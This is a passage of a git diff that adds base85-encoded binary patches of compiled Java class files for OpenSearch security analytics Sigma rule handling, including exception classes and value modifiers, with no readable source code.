z!s7C%JB4$wy3-tToT2S1x1XU7{tK1PSZ&69!;j*ya-?4JZKl0P1JmW7v?J4C-@ zT9vufrW9ghTSPk*58a@Y(5=b>+N+ddo4Ak;C>PPa$|5?XTue_Ym(o#XF&#rXpj<{L zk)Bd6x44hf!y=<^KxB79WCu(^MVDriNj*cWRo;`EJ1io&4jbQvaVvZ`--EP;H15SQ z^S$`r3c8TqhqN8({Yc@D`2nPel>8u4EQ$FcoZDcP$6o}GB@I7}6rPD6LAnp=L8SYU jK8kb?(nClOqn{k_r^5<4cAz_VGU6&wKs`LcPAA literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/condition/aggregation/AggregationVisitor.class b/bin/main/org/opensearch/securityanalytics/rules/condition/aggregation/AggregationVisitor.class new file mode 100644 index 0000000000000000000000000000000000000000..f8850a84f2a825dfb65f0b9b3876967edaeae896 GIT binary patch literal 4311 zcmc&%TTj$L7(IiRx`@h6Ze9=txv10&iUOjzqR|jAVT19B%$CVgQrc$PUD+7*%_o16 z5B>mul=0hcnO(cJ^3X01&FPs*=A7^Q+L>>D{r>S2z&u`R=wR4zWJz~iVS9p0V^{Zt zQI@7(1ZkP0p z;+`;k4W}7qYEsMym#?0h^9BTfHH=#)Hqeir{r^ZJR2NPnw{ zl@3Dh55A9ZevA4JUbN^O|CD+yA`*!Su-c{`jyv>Cd0_TCpFwY!cJBMR=QV jmQW|WM|hubj_@JjJmF))1;Rzbr-aLd&k0uu^T_=Hlc@&o literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaConditionError.class b/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaConditionError.class new file mode 100644 index 0000000000000000000000000000000000000000..0ebf11383060470c62eb7b8d244666790cce4352 GIT binary patch literal 490 zcmbVIJx{|h6g-EJKqwR{fmqr2knqURs!LT^B9@@;u4|=6iCx(aqCblXiGd%$k3zfz z76em$(v$D$z4M(vKHuH}++dI*VwhT2a=TK-E8*mldnFsE!&(?ot%H`HyQWf}t7oZJ zL0jW_q03rKtXb%mPo1+aMa(eTP^wd4NJiS|FlIPD&mYB;;FT~XFM`vi9A3;A;)z|T z3|rXkVH*iUKi5XxH}zb(2QjY{!yva(R5Rgp%YT}2SZdF3mv89rchn(6S}X5G*}eD2 zDMMD+#z}RnTSuq={ML25gflS8(jG>jKvYv=V?+cXxx9MC&I{clWK^@Ro6+PR0XX@d TLJ#}IXdVaXcUp(UA{>1Inv#fO literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaDateError.class b/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaDateError.class new file mode 100644 index 0000000000000000000000000000000000000000..2f60512e034b9b7a0959b2af15b73a230ac721b4 GIT binary patch literal 475 zcmbVIO-lnY6r8MeSJ!H_qIYk8fH`_-DdN{@@lxqMT_4-XZc>u0v_H#};K3i@j}qUm zB8azU;E{O@lbL*czP$suKtDkwaA{p3?VOA!XN*qMNade zt?_cKi%Q+7K)23Wm!KmsT+yX<5QvA`=r9sEIL@Bbvy!DUg&YT`O))r`2z0LPBc)iw zW*6&-1$vn_bYE9fat~@+l0ZMRxhf~h>4yI-J7K21z*V+lzTcJufuthuRnb26FQh;^ zwzbRYPB&rp|NhZ=qsI{hH)xJva1EXbvk@W&5TBmCV&jEx5mKIMyG>cS#Q+Y!Rp?@y P8SAlwUhB2XEW+Lwr)z=O literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaDetectionError.class b/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaDetectionError.class new file mode 100644 index 0000000000000000000000000000000000000000..be28b30ddb1b627d1c7844e012c95a0720422d29 GIT binary patch literal 490 zcmbVIyG{c!5F8&N2S*?f2}DcBL&7CRqBIa_PBcO39kaR^UF^vAA@W(NkSO>7J_@mS z&>*Pdkyf77?s&!@pKtE~uFy-72#lOBq+5^;q`aQVK)UiKE|pc~G8!GEuSyD%UNkMD zaW=@YDdy^iBI%lsymvlDOJK03RHGo!9vExlP~h-1e^Sp%mdX}#9KEqc|7;@Ax^|D0 zVFTM8Y@#jD&5fn|YCa|Zpr$1W^m3LVB&h-=Dhh=c*O&o5rFwc=ZXjBD0(GoIXG07u_b S=wO!_&tnhWMr)s0f`c!FONdGU literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaError.class b/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaError.class new file mode 100644 index 0000000000000000000000000000000000000000..dc5f8f626ed5948f6ae1ec8299babd0b36188100 GIT binary patch literal 544 zcmbtQO;5r=6r3#|g;GF^aQDVX;vPLnxES<8ykNL5byL=qF4=93{3}f~CLa6&{wU*X z!EoT{W%te7dGluW`{(luz$JPv9EPzr5!V};SSd`n;#P*4QR!ABBHpGdwA^H|v|K)i za+4~ZSUy+LT1<`6#zmQ-^C+GKk3|yk=^u%~T}x|4BpHI)fiO>vN}?-<>R2TzoiKF! z$IpWWL-|@iNDn16e7LC9!O-+kL6xCBQ;EFG)=O#b#WF5d=upH9VN{Oy&2qX@mSHmc zPeQU&%4mM&(}Ghwr(_gX5g6m*~eCoZLTE4%L*2&N`u6!VcYy z;phY2aP$uUwIH?VY!#z<@FqM$ZR+)Qbe!On5DgZxjN}4z_M)6_MsJnj8~hh492y2~ R&znIZP zT|KF%X5f)|yf>N2$LHHSfGhN3L;@r03TYQ)JSmsYq^G=cI;@mY$2X$2?VF9k6>^lt}(MAA_mYtzj(#g3*RCnT$84o@Z=5y WIQpJK2fNI89((9ETKmi*9DD(zdWm@e literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaLevelError.class b/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaLevelError.class new file mode 100644 index 0000000000000000000000000000000000000000..a828c7ea2404a5ef1bfcc8ec505e9e2b3baa2eed GIT binary patch literal 478 zcmbVIO-sW-6r7DQ(O9h(_3q6NaE~5Z3R3hGyhM86#z(r6?3Uf6*q`O8;K3i@j}l*^ zAn2_-@Ys30H#@T*pKtE~ZZL=u2;5p%NV_28Nx6J3J>`wl^-394u46((fq?eo) zwYJ8~Oc#|(X-VasbJoQO1x6dnbP58|NE=;`1y0V>XSGzaRHl$w?X)R|7gK?7VxK6% z7Iu5sMkLTrwV{Wmnvr`{vyub`sm)b6RZh43ry16B?FA<3hW>tI4h7vjQW5S*bsg26$!#>~bD7(jG+wZ_gX-vT6DldhZaEIeK)x>+}bEFKTHKjTQhHPZ4iDQPt)ACU~30@1Uc@@2}dU!TvNUz<4 zDzJg=9yXCN^h;yaU9*@ee=laWVi=T8ih3%%Y57kxjdK$iZp$_O{f;_h$QLREp}YV7 zIAtiRZZS8eb#(mCwl3R8I02(9?O_B8L^UTiMnV9x^NUw(z0fT|LAB_*1x@Y{fTQmz S^sq~e=COxH>5MEJfYj^hgh-c4a4s{wyXW27UlP3ULW6 zh^>Co$?tUc{GLC*-ai0bp%)`kxN$z$Zb>$f@!4Dl$|}$0%2-pZO3s4zRY5`1OGe9* zoeg@-`NG_}89y@lTkoBZ(NY+!snjSavZ1e_M`|o=h)4jm&oADv^(wariPWU&CNjAr0FHj9 S(7~=Sna3Wwjn=-f2nXLt!-n?& literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaRegularExpressionError.class b/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaRegularExpressionError.class new file mode 100644 index 0000000000000000000000000000000000000000..3af22bd99240a05accc49b88c1eea7e6e97a214c GIT binary patch literal 514 zcmbVIJx{|h5Pc4%flw$^f*CeGBs?-ubwOncAW_ua4X4y7wX1W2+MmUQ#J~^WME!oxKEHP#pKtE~F3^h+DcpF@wV#sY(6vhlvjn};bP7dg6KnL&oNpG{S`+x6BOEg>ufnt*gsC6%(Kyjak(CqY+ZhN zGFE6^`A15yhRqJv(N^fD*3oS>n-D*kNkIy|)Mus`8@4t75nJWd28FwHMSp)szEp^3 zvI3Jg|Ne5Ukc@oA8C~1j+2KFiJFg$(2uiZmM+qdL)L7U6kpO6)p1oq@MQ#xisY#tH8puj&m}E` zw#LgsR|{1H6&iozoOLN;f$^F;oq|9z)<%bk!0;q-k zz;+LtNCf)1Hgwl4X5{YGtR{g$Zc9~9mD4T%X~to$y})(8roUe~M*``ByjNBC*gu;B zSz#Mj(yeao4FCSqdAorl2u{%+!Qd!dQ)UxH3?Ml@d&SlZ-y&pOv#y)*3aoHdstfxW}{Q9UV{DV@r3X<4Vkqp3jW z%FHRk3f6mAMOUC7v!?qhpOKxYSw;eb*d!{OD$5Q3S$4_=JAuo1$(+A!hXP?v&Z)G0 z>R(8KXlyE*&@DG%cK`m>X`{yhgm2Is;o)oe8G1HC-~n`xPhPS1;%@;WKcjXVdF6%& Wu>Y+>51XEOJ+{zqy|z6Iu=54z6oq>L literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaValueError.class b/bin/main/org/opensearch/securityanalytics/rules/exceptions/SigmaValueError.class new file mode 100644 index 0000000000000000000000000000000000000000..503817dd22e1125da781116b43b68e460b55123f GIT binary patch literal 478 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 literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaCompareModifier.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaCompareModifier.class new file mode 100644 index 0000000000000000000000000000000000000000..754ab23d1fc4b81acc354761ed07c61b20359ed8 GIT binary patch literal 2855 zcmd5;ZEw?76n<_J;x-uQveHqY3#IFt7lsGrZA%ESP#9WRHx)(N_UYEWO)qn7%f6}T zPvJl81C!W*O`7=3k3u`wb~6(Yc#)7$BmLA@(J_!?So4Cu<@v%5 z1rO{UD-`xHkZO;++}Tso4y|D5h|n5%TXI{9Ahb4Qf51E5z~_Oun{W*j7&?=w>Tzc{ zQpAw+e1>xOKHue*!`;5Mp#tgln+(O4bfs!D^s3#Aro7Gj!d409n?lh+dhQ)12F=*Q zP)Wz?%1||HJ%(xW&E;ws2!`L@gOOIst&YRPu+_-w$yogN1K(`ZPeU(sye&~e9*0aA zm|{56m9F@HIM@`yJ-+FXN9C?(bEn4xsm}?spmt=)aC<@=V|74TI<%DzGgU=a&2PyS z!wmO*M~ba|zX|fpcm^5fUiEO#-}iERO!hq`g5f|Y)H)UL(P}EyNd?z>(_lDZ;sA;a zW?!g#gz#JGD)MHfT8je3eQxgv%k~BX&kdsvShdv9cZBr=mjMO%$83_XyI5~0MIW_Q zTz|xCHw~O(xRSA@6k$#pDy}XAr?dBd>UL5(YY+TDgdw$M37_F}1Ir9c8p}H(VPXYU zJubExzDq}YJ?i*yps25sr8;aY%-sOI>K}#FnFtEifsdw!Bo4$_D z>cms3sXpk-i)NPI07Mmtrd>_vX*%Ul!a@4~g`~8cQE!}i0`qqw^Egb;5{Uq_boD5X z5OpdR!wf#66J0D+=3kJVaaaHV literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaContainsModifier.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaContainsModifier.class new file mode 100644 index 0000000000000000000000000000000000000000..5b21fc4ad68de1cfe88dade7af434b4ec2d1882f GIT binary patch literal 4326 zcmd5*yJ2@zsfzb2 zUcM@P@eep7eu_ubzBJcn-- zG%*ZXc2Tn`!gK_;^Cis@`KqnE^W5adysPIO&8`~4(aKgqpV5WwXk&V@%(Is1a@}-B zf@1|O4B5tbO>mWmm#`*c%x`xz!uxrhv{>8m2|2CAJBE^Tzn9Ck%Hle^02xK?#_ zL(A!oo9UcjSWhOH+^yPz;fF^cq|X;>aI>go4emI7T~RGr;pVzmGX3DLI$HS>k&wO6t z`I6A`R=I4MjwTUsRCB8pLulu?Zj;;2N26S=c)CBpatKy*)}K+Zli^szOmRu)AWz0z zTQ`dec12Iz(CrJNST(pkaJ^y+$DwSCV-NNz*vs&Q)a5@sp<+J{Ff>^+3};fId>Qpp zIc#ch64k-2UJA`K7?CquRtHBL(A|=-GrpV%6>-@uhWNnsyr{^!<0v@HFcL8$V)2?^ zSywrBz_u-$F}ERe`l4oKD6|sSE9+*%e7wRHRf(`m8`g zZ`l&JdEOPaN-g{t@tBj{bCl9(M=Bd;vPkF|aa=_PeGKbty;veuhS$is#*iOJ0{tpp z#7mR|j>~P=nWRjjlGG4jGtxyTaY{j!q4%Mje!`p|HOUn!1~5onzN{AthM?(U?Gp2l z=GM8BI};dEF^tpXeX4#mI~5q5hqQK)U1T*v`1DJ+r%6u5h;)67wD24+)f-iDPO8^R z-IUHH<}RohlK^Nj2#Rqe@rsHGOp==jgj93H^$Nps7zR>ec$EruPdbh%ysqFi>c~rQ z^l4=HFEeZngDSW!!#RaFRB%j_LV1Gk3Bq4XYPd7oPIG8Mg#e*8XXa@s1Dv4_Pc%W@sp=9LlQmaKvk$9wod!TSsyOMuqRIcrvE zKB#;=4pP0f?0E^)4;j7-!!e-t84hui>W$Npv#i-_B|O3e5DkHL*~L)9_3D2>J{6*0 z9D-J9n&pNurn@4usTJ?W@ChNcC(UB`j24VmP=`%Z*xvsTL8Hk{hJ&k^tYv_LuNe0H zJ1J$fZ!L{;B#-hL^dz{W6-`iR*Mu0>(|d}}<##3B)%`Q#KY4^IJ>x_IY^4j^uz^=6 zExmxF3wXYU7jC1izCBUH%aipDeLJ)K+u6zP1)R@y-SPSAKHuamT=DrPN4jemZ@*Z> zrQ6so*UdFtX}kPANszm{$OAPL>r}J1vCCVRYoK+V$f^@nq_{gwI;6#O$RIfw*h|lS z)I9bhg#+j%N1P%@oX2766DeFoC)L(8uAvJz(T#7>gCC*cR~lvR;RybqVMT^7O+117 zi{ZNu7gcg)f?C8J-lPy*!#J(3(`qS@l4_o)-lDtP(E1m86(o`mmmvf}}vs2Ok5 g*CxD!8}!~ttB>f$$KLZ(d`@R^+JAvB@ih|v05ly%rT_o{ literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaEndswithModifier.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaEndswithModifier.class new file mode 100644 index 0000000000000000000000000000000000000000..35c5a990756860b2adbbbc73cff08967c66c5003 GIT binary patch literal 4186 zcmd5Wbro85JHQyNk6 zh2b{{U;G1pz%Q}#!O^e&B!+Q3cXyj^n+`6SVaCZMd+*(I&OOh$&pG$x?|&Zu0pK0n zQ_#gQVL4UJvW4ji?vxiaSCs3H?lri{jfSU}UCpT*!qsY4MW5G&<7zW{wZ;o(#l5Y2 z3#D*bL4qOQnXOrF)WxbHhMqCq)V*AfXy6fczW*N2;1e1GpM=<>I0yY^7HZ{0e)$#^+-Lb*ANH&CdH7dDr`bgIkd8;Cl z=*CMbwxEY$dr>#Vg?epHI9K?bL5TW_R+$^K+|lJcTugWiy2~)xp&uKMJIAoC5{)w* zeq7VfI4p(~w{1fgl~v&6b86!eGVERtv0<;moZle(f=+@#tqSi7?K`QP9{G4YGvLGL zHZLy-t!&k5mg#De0Vg%DZW}_o$aROpb}61@yW`pMkjoKT(b{-U!9Ir5F*C&@pTj(v z@f_W(DtI-1;zqPDi)!8APGQ-0gzHkaCGi>#DmcLKy7c8gBBA0C4l{IF^9<)Rk$jo< zQ#lGXT!|at9zTT|3`XqCmes-43RKR7lMD8VQ4!Z^F(eDiWns&@<0?4LP>OjXqNNs8 z*0#VF9LI7P^E!ev7B?#+M=N=~v2J#3$1hxQors3C;~m>dK+J>K7y;>d5?Kr>7-TpZ z(@GSAiZ?J!7n<%C#k|MRof)_;ExxJZEu3IbsE7n_c2ZUFFDgH|L&hiZHclxRVc4v6|(uTdsZN$QBOIT@m}IHw@bF!EeMKVvqgO$vpI0w(B|uj!SFA*j39yu>^w z+*Ruo&NL=fOyMJnK2<;Johl6ObE0jTi|s~)pF!y+PtKyKq9oBO22qT#Cee>+6&G=d zB0&72aw3*(hV={!4fJA$YVdG2iL1D#fclHn8q)$9d9oif?27Uw)Rrf871veVz^BCW zGBNWEQ7e&|8p!uii+NMU=lFtQPmM2%yk(ZTCz(MbqKSWP9^1@nBoSIT`!T1Y42tts zcMa2~PR+^)5C^It4k~mL+q&$EDEH`17PnL^%0x)Wc+oPY5Am#%0!5ek7C-qIM&s(Y zpCLn`1Ld|$f}Ht1uAOL!`d?I8Y9?nqUS2G5J8V~zGgjRxiwXbe_HFu)V^}hk2z%DD zJlAu$T@v1cRdJKJjfR3{h9hfS*3BhrQD_050xC{W6}6m(__|Ipa*g^`JrutYk#Ds&ZJy@2Va({B$ZhYzQZK$CrVeKr^_^3u zDIEV#g`hs;JBFiex|{i};0K1+o-Il_9DtKftgY{fTsGD3x8o$rZfY#Cs2sTAiM0;=^l0D>z>qd=%)O3v~M* zU^LL}FAX(uq3?1NR~}-&9CtVIN$Td$WJS&%<1?TMPGdoq^hZqMN%(k9`A7~>ln&B8 za|jt6#t7jUB^+afp@id9bTcq9fIAq(T@2wKhJCFp*#PdhqJ19*YJ@yZkuYIV#I8c4 zkxiquxJ#)oNy;JJok%>zh=TMJ^gPA5g8nCTDf!Ncj)^yzNJ}`MtAW& Henk3TO-Cah literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaGreaterThanEqualModifier.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaGreaterThanEqualModifier.class new file mode 100644 index 0000000000000000000000000000000000000000..0463b715d34fc28a77ea79c53f5fe173db346bd1 GIT binary patch literal 1099 zcmcIj%We}f6g{4#NgF0j8fbZ=!m6|tv+N=vn@|waP>_PMcP4J)%3}|-Hl}J=krD~+H@43F`K92qC_r*^D2Y69Mz;I;jI5L^gPH>w{A}5mEN+CJt$-=eyN18!wu&%m;uNXPKymX-hSs(mu|}&PZ{e@+?(LtWw%ZENu>OO95?b_MzjQVztcegCxKG&j jRRA7flPn6w79J9Lv3rEaME!*J;a}t_Aq>w53-J681*=s& literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaGreaterThanModifier.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaGreaterThanModifier.class new file mode 100644 index 0000000000000000000000000000000000000000..2d2f9fee2fe61fd7410a925393b578884f593565 GIT binary patch literal 1083 zcmcIjO>Yx15PeS4qz#)U4YYg~!L78Yd*qNPm++yA1r9;EJDX|ZYS&)b-b(pTT)2SL zLw`VjRK;wYpb`O!Dpi(j&l}J4%sl(z^6VVI8$7R}ByeQxBs3XmN7BaA&{3RQZf1Yx15PjaHNgFmz8ff{Za4Rihj~o(u2}MF|;gBkKXERM)?b?g&MaqBT!UZG_ z`~ZFwVzy0Ci2y~FDoeKKjpuo0p8ezJx940%cZ3Sl|ZehwDN}n z!@YP#N;5j6#LqK)MV<|1^czoEH$IaeWmI^TMzM0f`*bL7=KUGfP_==hT^__GDn&Zpz2=rIw z|BuE3ZJFn(qVb|%oOpX#d4Zij>zw6_T2GhGUXy?Vje#j_La$ZX_T7JfsOROY#S>Pw z!e17=vaYBhK%K1s>)7Cx*jxIW`v=dyqOsozzhLt-0~K_5-aL1Yx15Pg%RNgFmz8fby?p>iuNVvigW^%AH+THuf>cV{zAT7o+-vq?=*+zHoc5v%^+|<=*GU*@=X=jbge@t;C|_76e7=QC`d61G%1pyS zqMYj=uUpAVqnBOjoyaItuMM&ZH&Ml%02`=pqD7#76NGkv4t59|j{V1+uzPqdi=nsL zOfMPQkv9CHNXKl?)HsnAbfYX*$w*mU+6%DeXW9|o-Z1gi7t$lNCf9`_4A!OokGh18 z%JW3?WZ5anxwEP{Vejt}=lQbC^Odu=BpsnS%nBRxsV+Od|Ic6avV5v|CR$eIi$YdW z6LnP35UYYsY{|;vE&Z*d;}_r1Jn9BtvHeAWD!MXnUpm_o)VS$iYz#O^bwNxU|ZJ)5h5*TW#!Uca4<)#DxzBb;P*BC@$kosu@03a66XYQK=F zGz+g2Cv0w%6SHirFSW8xoa@O<#@hMMYf%GrLcf}wjSa$XPp8`V3BxyWNn6?IN+o`c z=u~-Tbe4YdY8J&;@|zU7*G2@W(b15w$H-IZbE^p7@4!iK<=RE@Sufz*d-jqI#plt*+|(7IWinkC(aUShSKW5uZ49#)sApl5yy6w zBf|c8JI91US+oBs6rnBWbEDOG6Ex#(7t2TJ-VARs--LKs(7mH7aDy(3v>=$$y%YM+ zi8Jk|%0@?JvvuPZk+0;gSJs>7RIW$pg303KRJOBh-LfFIL$2)cRwI;LBgG5^vV zmfJ*q)M2=~x0c@fuwd%1K|GYvkG?44%pTMdf z+qJ`9f${cQ5#B@8Dz0-K;{sRS1;p=?IuyH!es9uBp%Lp%tigiVJcEAp2EI-$AQsB>Z9qp-AFvVmXA!8ios=TFcJj#(csxjD}bbmZ^KhQ)$oWuKR}pG#pIo-oiR zuuX;if7ou~No*G|NNdoVV)EEPGSw-CI6Kg3AS1A=##B;n7870A!6>zZhyzb6v%FqH&)Z`BWH|il(w zI?)`nri+gB2hJ9JD+tI{jPgY${W?*q&-dkm zYRgkNh4m>+K$JezdZCY?4|@|u@wqe@Rv7rzDvV40Z0G|P=0TD}ZDmYYo#J9)Lx z@Z1{Mm^E;Qs7kb#R!umn7$#intge`@2@eGV9NlajzEi!er&_U`3-~5Jh!cwY&_ogQ zEbMY}vd>|)ZHWnKA^SbYiS9@2xD@+mO)Tg-J|lx+&FKU_p*rVJs@|d6VLQfC_%uFa z;AJ)pC6P;50~4Rc=U8b1+nsi-&~ud)1lsN>Z3%o`XQY&we8$dtg7cjrPE%NS)d@2TH3@hyB? z;NdwrYxR3>UWUinXmb>VQa7dS(>4F)Cs#tsJIZB_$M9XH;_p>;UGch7vcUIE3}Kjd 